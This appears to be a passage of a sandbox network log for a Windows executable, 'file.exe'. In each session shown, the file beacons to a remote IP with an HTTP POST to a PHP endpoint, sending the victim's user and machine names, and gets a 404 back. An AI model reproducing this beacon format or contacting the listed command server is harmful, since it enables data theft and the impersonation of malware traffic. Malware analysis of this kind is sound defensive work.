Nov 22, 2024 17:39:11.694205046 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:13.054687023 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49807	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:13.330580950 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:13.452853918 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:14.727401018 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49814	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:14.984954119 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:15.106128931 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:16.480851889 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49820	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:16.753679037 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:16.873575926 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:18.289005995 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49826	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:18.652259111 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:18.772634029 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:20.131437063 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49830	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:20.393621922 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:20.515913963 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:21.922034025 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49834	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:22.188827991 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:22.314599991 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:23.676054955 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49839	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:23.947361946 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:24.067070961 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:25.302767992 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49845	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:25.577486992 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:25.697513103 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:27.054007053 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49851	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:27.315241098 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:27.435691118 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:28.888890028 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49853	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:29.157468081 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:29.277427912 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:30.602054119 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49858	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:30.860815048 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:30.980501890 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:32.319843054 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49864	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:32.582351923 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:32.779201984 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:34.064419031 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49869	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:34.334594965 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:34.454699993 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:35.909826040 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49875	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:36.518543959 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:36.638263941 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:37.911163092 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49878	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:38.199114084 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:38.319160938 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:39.774283886 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49883	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:40.033540964 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:40.156593084 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:41.435794115 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49889	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:41.712372065 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:41.832001925 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:43.209742069 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49894	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:43.480339050 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:43.599899054 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:44.928255081 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49898	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:45.187427044 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:45.307094097 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:46.763998985 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49902	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:47.035160065 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:47.159996986 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:48.566066980 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49907	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:49.049055099 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:49.169188976 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:50.496753931 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49913	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

